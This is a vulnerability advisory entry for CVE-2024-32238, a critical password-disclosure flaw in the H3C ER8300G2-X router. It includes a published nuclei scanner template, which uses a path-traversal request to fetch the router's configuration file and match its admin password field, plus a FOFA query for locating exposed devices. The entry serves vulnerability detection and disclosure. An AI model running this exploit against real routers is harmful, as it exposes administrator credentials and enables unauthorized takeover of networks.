漏洞描述
H3C ER8300G2-X is vulnerable to Incorrect Access Control. The password for the router's management system can be accessed via the management system page login interface.
CVE-2024-32238: H3C ER8300G2-X - Password Disclosure
PoC代码[已公开]
id: CVE-2024-32238
info:
name: H3C ER8300G2-X - Password Disclosure
author: s4e-io,adeljck
severity: critical
description: |
H3C ER8300G2-X is vulnerable to Incorrect Access Control. The password for the router's management system can be accessed via the management system page login interface.
reference:
- https://github.com/wy876/POC/blob/main/H3C/H3C%E8%B7%AF%E7%94%B1%E5%99%A8userLogin.asp%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
- https://github.com/asdfjkl11/CVE-2024-32238/issues/1
- https://www.h3c.com/cn/Products_And_Solution/InterConnect/Products/Routers/Products/Enterprise/ER/ER8300G2-X/
- https://github.com/20142995/nuclei-templates
- https://github.com/FuBoLuSec/CVE-2024-32238
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-32238
cwe-id: CWE-522
epss-score: 0.90699
epss-percentile: 0.99591
metadata:
verified: true
max-request: 2
fofa-query: body="icg_helpScript.js"
tags: cve,cve2024,h3c,router,info-leak,vkev,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET /userLogin.asp HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: module_name
part: body
internal: true
group: 1
regex:
- "<title>([A-Za-z0-9-]+)系统管理</title>"
- raw:
- |
GET /userLogin.asp/../actionpolicy_status/../{{module_name}}.cfg HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code == 200"
- 'contains(content_type, "application/x-unknown")'
- 'contains_all(body, "admpwd=", "auxauthmode=")'
- 'contains(server, "H3C-Miniware")'
condition: and
# digest: 4a0a0047304502200e488524ed1e091bdd0eb018546662b565ba5c3aafbdc90191beca6f188e0315022100dcd210d35a6fbaadd9b3cfdc39cd66c4f88d5010fae0a232cb234a307a82f664:922c64590222798bb761d5b6d8e72950